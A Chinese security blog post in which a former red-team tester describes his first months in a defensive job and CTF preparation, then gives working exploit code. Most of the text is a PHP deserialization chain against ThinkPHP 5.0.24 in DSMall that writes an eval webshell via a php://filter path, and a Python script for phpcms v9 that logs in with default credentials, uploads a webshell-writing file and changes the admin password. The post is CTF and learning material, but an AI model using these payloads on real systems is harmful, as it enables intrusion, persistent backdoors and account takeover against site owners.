将近四个月没发文章,因为工作确实挺忙,另外甲方工作技术能力提升会稍微慢点,入职四个月可以分为两个阶段,8-11月忙于hw,11到现在忙于CTF。
8月入职以来,单位培训一周就开始忙于hw,说来也是可笑,去年还是在攻击队搞渗透,今年就变成防守方。单位3月就开始忙于hw,上安全设备,重新部署一些架构,惭愧没有早来实习。说说正式hw做的一些工作,单位领导知道我是攻击队出来的,交给我第一个任务就是对薄弱网络区域进行渗透测试,我带着厂商的几个兄弟,确实也挖到不少漏洞,具体漏洞就不细说了,搞到一台服务器看网卡是通生产网的,当时兴奋的不行,可惜那台只是配了IP并没有加路由,出了一份渗透报告,getshell了不少也算是能给领导交差。正式hw阶段,开始不熟悉单位的网络架构,安全设备部署情况,也是厂商兄弟和同事帮忙介绍,巧的是得到原单位抽签抽到我们,快向原单位同事打探下情况,是否准备0day,更巧的是另一个同事离职去xx当负责人派的小弟来我们这帮忙,后面正式hw工作,主要还是负责应急、溯源和盯监控设备,还写了一份内存马查杀的手册。期间主要还是熟悉单位的业务架构,不得不佩服小hw时,xxx单位的渗透报告,着实是学了一手,所有渗透手法、知识点全都具备,如何能够在短时间串联起来直捣黄龙才是渗透最难的,期间也出了很值得学习的溯源报告,最终成绩也是相当可以,最值得一提的是,工作确实认识好多厂商厉害的大佬,id就不说了,也认识了北邮的朋友搞java web的,跟他也是相谈甚欢,所有研究方向和想法基本一致,后来也是帮他内推了好多各大实验室,基本复刻我去年走的路,最终也是成功进入到梦寐以求的一个单位,不得不佩服小兄弟刚20出头能力已经相当可以了,以后前途不可估量。
hw结束后开始忙于扫尾工作,写各种报告、总结,最近结果也是刚揭晓,履历上可以加上一笔了。后面组长将渗透测试的活交给我来做,开始还是身体力行亲自做,后来驻场的人过来,把这些活安排下去了,u1s1做这种系统黑盒测试,对技术提升就那样吧,遇到难搞的系统才会亲自上阵。还有对工作的感触,就是有的师傅是用心在做安全,有的却是在混日子,开始想着驻场一年带带他,来年技术能力有个质的飞跃,后来发现他确实只是混日子,算了对某些人确实没太多期望,后面也不想跟他交流太多。有的驻场比较灵性也听话,后面想着带着他把codeql在单位落地,搞一个自研的代码审计工具,挖一挖简单漏洞。后来就准备单位组织的CTF,期间同事写了种马的框架,awd线下的框架,waf和文件监控程序,内网渗透的checklist、awd-checklist,这些写的工具暂不开源了,有机会发出来。发现今年线下赛和以往明显不同,考的是基础代码审计能力,不存在以前的手速大赛情况了。赛题也比较基础了。唯一一个DSMall系统利用ThinkPHP5.0.24 POP链反序列化写shell还是挺有意思的。具体分析看下面吧,在linux绕过死亡exit,poc贴下面了,巨坑的是这个poc在MAC上写shell写不进去。
说说以后的工作计划吧。
1、手头几本书看完(安恒红宝书,0day攻防)
2、pwn捡起来,出的新书看起来。
3、codeql落地,写一款自研的代码审计的扫描器。
4、单位安全运营和sdl工作。
<?php
namespace think\process\pipes;
use think\model\Pivot;
/**
 * Empty base class; it exists only so that Windows below can extend it,
 * mirroring the framework's think\process\pipes\Pipes.
 */
class Pipes
{
}
/**
 * Entry object of the serialized chain: it carries a single Pivot (a Model
 * subclass, see below) in $files. The property is kept private, presumably so
 * that the serialized form matches the framework's own class.
 */
class Windows extends Pipes
{
    private $files = [];

    public function __construct()
    {
        $pivot = new Pivot();
        $this->files = [$pivot];
    }
}
namespace think\model;#Relation
use think\db\Query;
/**
 * Stand-in for think\model\Relation: a non-self relation whose $query is a
 * think\db\Query (the Query class defined further down in this file).
 */
abstract class Relation
{
    protected $selfRelation = false;
    protected $query;

    public function __construct()
    {
        $this->query = new Query();
    }
}
namespace think\model\relation;#OneToOne HasOne
use think\model\Relation;
/**
 * Intermediate relation class between HasOne and Relation. It adds no state of
 * its own; construction is inherited from Relation unchanged.
 */
abstract class OneToOne extends Relation
{
}
/**
 * Relation subclass used as Model::$error (the post notes that the real
 * HasOne has a getBindAttr() method). $bindAttr is seeded with two names.
 */
class HasOne extends OneToOne
{
    protected $bindAttr = ['no', '123'];

    public function __construct()
    {
        parent::__construct();
    }
}
namespace think\console;#Output
use think\session\driver\Memcached;
/**
 * Stand-in for think\console\Output. $handle is a Memcached session driver
 * (the aim, per the post's note, is to reach its write()); $styles lists the
 * one style name 'getAttr'.
 */
class Output
{
    private $handle;
    protected $styles = ['getAttr'];

    public function __construct()
    {
        $this->handle = new Memcached();
    }
}
namespace think;#Model
use think\model\relation\HasOne;
use think\console\Output;
use think\db\Query;
/**
 * Stand-in for think\Model, carried inside Windows via Pivot.
 *
 * - $parent is an Output object so that method calls on it land in
 *   Output::__call() (the post's stated purpose).
 * - $error is a Relation subclass that also offers getBindAttr().
 * - $selfRelation is what isSelfRelation() reports.
 * Property order and visibility are kept as in the original; they determine
 * the serialized layout.
 */
abstract class Model
{
    protected $append = ['getError'];
    protected $error;
    public $parent; // made public here; the post marks this as its edit
    protected $selfRelation = false;
    protected $query;
    protected $aaaaa;

    public function __construct()
    {
        $this->parent = new Output();
        $this->error = new HasOne();
        $this->query = new Query();
    }
}
namespace think\db;#Query
use think\console\Output;
/**
 * Stand-in for think\db\Query whose $model is an Output object (see Output
 * above for why that class is chosen).
 */
class Query
{
    protected $model;

    public function __construct()
    {
        $output = new Output();
        $this->model = $output;
    }
}
namespace think\session\driver;#Memcached
use think\cache\driver\File;
/**
 * Stand-in for the Memcached session driver. Its $handler is the File cache
 * driver below; the post's note says the aim is to reach File->set().
 */
class Memcached
{
    protected $handler;

    public function __construct()
    {
        $fileDriver = new File();
        $this->handler = $fileDriver;
    }
}
namespace think\cache\driver;#File
/**
 * Stand-in for the File cache driver. The only value that matters is
 * $options['path']: it is not a directory but a php://filter stream URL. The
 * iconv utf-8->utf-7 step followed by base64-decode is presumably the
 * "死亡exit" prefix bypass the post mentions, and the base64 segment is the
 * PHP stub that, per the post, ends up written as a.php.
 *
 * Defender notes: a cache driver that only accepts real directories for
 * 'path' (no stream wrappers) is not usable this way, and "php://filter" or
 * "convert.base64-decode" inside a cache/session path is a clear indicator
 * worth alerting on.
 */
class File
{
    protected $options = [];
    protected $tag = true;

    public function __construct()
    {
        $path = 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php';
        $this->options = [
            'expire'        => 0,
            'cache_subdir'  => false,
            'prefix'        => '',
            'path'          => $path,
            'data_compress' => false,
        ];
    }
}
namespace think\model;
use think\Model;
/**
 * Concrete Model so that one can be instantiated; it is what Windows stores
 * in $files. Adds nothing of its own.
 */
class Pivot extends Model
{
}
use think\process\pipes\Windows;
// Build the chain's entry object, serialize it and wrap it with the
// application's own encoder (ds_encrypt below) so the server accepts it.
$obj = new Windows();
$serialized = serialize($obj);
$res = ds_encrypt(base64_encode($serialized));
// Plain variant without the application encoder:
// $res = base64_encode($serialized);
echo $res;
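/**
 * DSMall's own cookie/token encoder, reproduced so the payload can be wrapped
 * the way the application expects.
 *
 * This is obfuscation, not a security primitive: rand()-based salt characters,
 * an md5 key schedule and a substitution over a 65-character alphabet. It is
 * kept byte-compatible with the application's decoder, so do not "harden" it.
 *
 * Fixes against the original listing:
 * - curly-brace string offsets ($s{$i}) were removed in PHP 8.0; [] is used;
 * - TIMESTAMP is only defined once, so calling the function twice in one
 *   process no longer emits a "constant already defined" warning.
 *
 * @param string $txt plaintext; returned unchanged when empty()
 * @param string $key optional key; defaults to md5() of a fixed seed
 * @return string text over [A-Za-z0-9._-], three characters longer than the
 *                URL-safe base64 of "TIMESTAMP_$txt"
 */
function ds_encrypt($txt, $key = '')
{
    if (!defined('TIMESTAMP')) {
        define('TIMESTAMP', time());
    }
    if (empty($txt)) {
        return $txt;
    }
    if (empty($key)) {
        $key = md5('a2382918dbb49c8643f19bc3ab90ecf9');
    }
    $chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.";
    $ikey = "-x6g6ZWm2G9g_vr0Bo.pOq3kRIxsZ6rm";

    // Three random alphabet positions; their characters are spliced into the
    // output below so the decoder can recover them. rand() is kept on purpose:
    // the decoder only needs them recoverable, not unpredictable.
    $nh1 = rand(0, 64);
    $nh2 = rand(0, 64);
    $nh3 = rand(0, 64);
    $ch1 = $chars[$nh1];
    $ch2 = $chars[$nh2];
    $ch3 = $chars[$nh3];
    $nhnum = $nh1 + $nh2 + $nh3;

    // Byte sum of the key; selects the window taken from the md5 chain.
    $knum = 0;
    $keyLen = strlen($key);
    for ($i = 0; $i < $keyLen; $i++) {
        $knum += ord($key[$i]);
    }
    $mdKey = substr(md5(md5(md5($key . $ch1) . $ch2 . $ikey) . $ch3), $nhnum % 8, $knum % 8 + 16);

    // URL-safe base64 of "<timestamp>_<txt>" using the same alphabet as $chars.
    $txt = base64_encode(TIMESTAMP . '_' . $txt);
    $txt = str_replace(['+', '/', '='], ['-', '_', '.'], $txt);

    // Per-character substitution keyed by $mdKey (cycled) and $nhnum.
    $tmp = '';
    $k = 0;
    $tlen = strlen($txt);
    $klen = strlen($mdKey);
    for ($i = 0; $i < $tlen; $i++) {
        if ($k === $klen) {
            $k = 0;
        }
        $j = ($nhnum + strpos($chars, $txt[$i]) + ord($mdKey[$k++])) % 64;
        $tmp .= $chars[$j];
    }

    // Insert the three salt characters at positions the decoder can derive.
    $tmplen = strlen($tmp);
    $tmp = substr_replace($tmp, $ch3, $nh2 % ++$tmplen, 0);
    $tmp = substr_replace($tmp, $ch2, $nh1 % ++$tmplen, 0);
    $tmp = substr_replace($tmp, $ch1, $knum % ++$tmplen, 0);
    return $tmp;
}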
下面写的phpcms 后台认证的getshell poc,输入验证码cookie,ip就能打,实际写这个就是为了写写认证后的poc编写,requests.utils.add_dict_to_cookiejar(session.cookies, {'PHPSESSID': cookie})
会给以后的session都添加上cookie,
下面是一次session会话会添加cookie。
# Per-request cookie: passing cookies= to get() attaches them to this one
# request only, unlike add_dict_to_cookiejar which binds them to the session.
mycookie = dict(PHPSESSID="56v9clgo1kdfo3q5q8ck0aaaaa")
x = requests.session()
x.get("http://127.0.0.1:80", cookies=mycookie)
调试用:
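# Debug aid: the original used C-style "//" comments, which are a syntax error
# in Python; "#" is the comment marker.
print(dict(session.cookies))  # cookies held by the session before the request
print(dict(res1.cookies))  # cookies set by the response to the request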
#encoding: utf-8
#验证码图片地址:http://172.28.161.163/phpcms_v9/index.php?m=admin&c=index&a=login
import requests
import re
import random
def login(ip: str, code: str, cookie: str) -> None:
    """Authenticated phpcms PoC from the post, replayed against a lab host.

    Args:
        ip: host that serves /phpcms_v9/; every URL below is built from it.
        code: the captcha value shown by the admin login page.
        cookie: PHPSESSID bound to the requests session before the login.

    Nothing is returned; each step prints the fragment of the reply it cares
    about. From a log-review standpoint the sequence is four admin-side
    requests started from the same PHPSESSID: index/login, index/public_main,
    member_model/add with a model_import upload, admin_manage/public_edit_pwd.
    """
    session = requests.session()
    # Bound once to the session, so it is sent with every request below.
    requests.utils.add_dict_to_cookiejar(session.cookies, {'PHPSESSID': cookie})
    # Step 1: admin login with the fixed phpcms/phpcms credentials and the captcha.
    burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=index&a=login&dosubmit=1"
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://172.28.161.163", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://172.28.161.163/phpcms_v9/index.php?m=admin&c=index&a=login&pc_hash=", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close"}
    burp0_data = {"dosubmit": '', "username": "phpcms", "password": "phpcms", "code": code}
    res1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
    # The 330px message box in the reply carries the login result text;
    # findall(...)[0] raises IndexError if the page layout differs.
    print(re.findall('330px">(.+)</div>',res1.text)[0])
    # print(dict(session.cookies))
    # print(dict(res1.cookies))
    # Step 2: fetch the admin main page only to read pc_hash out of its inline
    # JS; presumably phpcms's per-session form token, it is replayed in every
    # later form body.
    burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=index&a=public_main"
    burp0_headers = {"Upgrade-Insecure-Requests": "1",
                     "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                     "Referer": "http://172.28.161.163/phpcms_v9/index.php?m=admin&c=index&pc_hash",
                     "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
                     "Connection": "close"}
    res2 = session.get(burp0_url, headers=burp0_headers)
    # print(dict(session.cookies))
    # print(dict(res2.cookies))
    pc_hash = re.findall('var pc_hash = \'(.+)\';',res2.text)[0]
    print('pc_hash: '+pc_hash)
    # print(res2.text)
    #upload getshell
    # Step 3: member_model/add as a hand-built multipart body. modelname,
    # tablename and description are random 5-letter names; the model_import
    # part is the file the post describes. The raw reply is printed.
    modelname = ''.join(random.sample('abcdefghigklmnopqrstuvwxyz',5))
    tablename = ''.join(random.sample('abcdefghigklmnopqrstuvwxyz',5))
    description = ''.join(random.sample('abcdefghigklmnopqrstuvwxyz',5))
    burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=member&c=member_model&a=add"
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.155.1", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryXKC2cbu1uVQg3Tr3", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.155.1/phpcms_v9/index.php?m=member&c=member_model&a=add&pc_hash=gGF834", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close"}
    burp0_data = "------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"info[modelname]\"\r\n\r\n"+modelname+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"info[tablename]\"\r\n\r\n"+tablename+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"info[description]\"\r\n\r\n"+description+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"model_import\"; filename=\"1.txt\"\r\nContent-Type: text/plain\r\n\r\narray(1);$b=file_put_contents(\".cache202012047548.php\",'<?php eval($_REQUEST[z]);?>');\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"dosubmit\"\r\n\r\n\xe6\x8f\x90\xe4\xba\xa4\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"pc_hash\"\r\n\r\n"+pc_hash+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3--\r\n"
    res3 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
    print(res3.text)
    # change_pwd
    # Step 4: change the admin password (old phpcms -> new_password) in the
    # same session and print the reply's message box.
    burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=admin_manage&a=public_edit_pwd"
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.199.181",
                     "Content-Type": "application/x-www-form-urlencoded",
                     "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                     "Referer": "http://192.168.199.181//phpcms_v9/index.php?m=admin&c=admin_manage&a=public_edit_pwd&menuid=971&pc_hash="+pc_hash,
                     "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
                     "Connection": "close"}
    burp0_data = {"info[userid]": "1", "info[username]": "phpcms", "old_password": "phpcms", "new_password": "nongxinyin",
                  "new_pwdconfirm": "nongxinyin", "dosubmit": "\xe6\x8f\x90\xe4\xba\xa4", "pc_hash": pc_hash}
    res5 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
    # print(res5.text)
    print(re.findall('max-width:330px">(.+)</div>',res5.text)[0])
    #
    #modify system.config getshell
    # burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=setting&a=save"
    # burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://172.28.161.163",
    # "Content-Type": "application/x-www-form-urlencoded",
    # "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
    # "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    # "Referer": "http://172.28.161.163/phpcms_v9/index.php?m=admin&c=setting&a=init&&tab=2&menuid=979&pc_hash="+pc_hash,
    # "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
    # "Connection": "close"}
    # burp0_data = {"setting[admin_email]": "[email protected]", "setting[category_ajax]": '', "setconfig[gzip]": "1",
    # "setconfig[attachment_stat]": "1", "setconfig[js_path]": "http://172.28.161.163/phpcms_v9/statics/js/",
    # "setconfig[css_path]": "http://172.28.161.163/phpcms_v9/statics/css/",
    # "setconfig[img_path]": "http://172.28.161.163/phpcms_v9/statics/images/",
    # "setconfig[upload_url]": "http://172.28.161.163/phpcms_v9/uploadfile/", "setconfig[admin_log]": "1",
    # "setconfig[errorlog]": "1", "setting[errorlog_size]": "20", "setting[maxloginfailedtimes]": "8",
    # "setting[minrefreshtime]": "2", "setconfig[admin_url]": '', "setconfig[phpsso]": "1",
    # "setconfig[phpsso_appid]": "1",
    # "setconfig[phpsso_api_url]": "http://172.28.161.163/phpcms_v9/phpsso_server",
    # "setconfig[phpsso_auth_key]": "NHeSSQfQfxsXQCPcxs99EtYSDiGI6pey", "setconfig[phpsso_version]": "1",
    # "setting[mail_type]": "1", "setting[mail_server]": "smtp.qq.com", "setting[mail_port]": "25",
    # "setting[mail_from]": "[email protected]", "setting[mail_auth]": "1",
    # "setting[mail_user]": "[email protected]", "setting[mail_password]": '', "mail_to": '',
    # "setconfig[snda_akey]": "\\',@@eval($_POST[z]),//", "setconfig[snda_skey]": '',
    # "setconfig[sina_akey]": '', "setconfig[sina_skey]": '', "setconfig[qq_akey]": '',
    # "setconfig[qq_skey]": '', "setconfig[qq_appid]": '', "setconfig[qq_appkey]": '',
    # "setconfig[qq_callback]": '', "dosubmit": "\xe6\x8f\x90\xe4\xba\xa4", "pc_hash": pc_hash }
    # res4 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
    # # print(res4.text)
    # print(re.findall('-width:330px">(.+)</div>',res4.text)[0])
# Sample invocation with the post's lab values: host, captcha, admin PHPSESSID.
login(ip='192.168.155.1', code='anwz', cookie='aic2c5br7fmmak60b28fu0h422')
https://www.anquanke.com/post/id/203461
https://xz.aliyun.com/t/7082
https://github.com/Ares-X/VulWiki/blob/a8a7d4d4d1530681e5b7f18daf7f471f7ff5c010/Web安全/Thinkphp/Thinkphp 反序列化漏洞/Thinkphp 5.0.24 反序列化漏洞.md
https://xz.aliyun.com/t/7457
https://blog.csdn.net/qq_45691294/article/details/109279879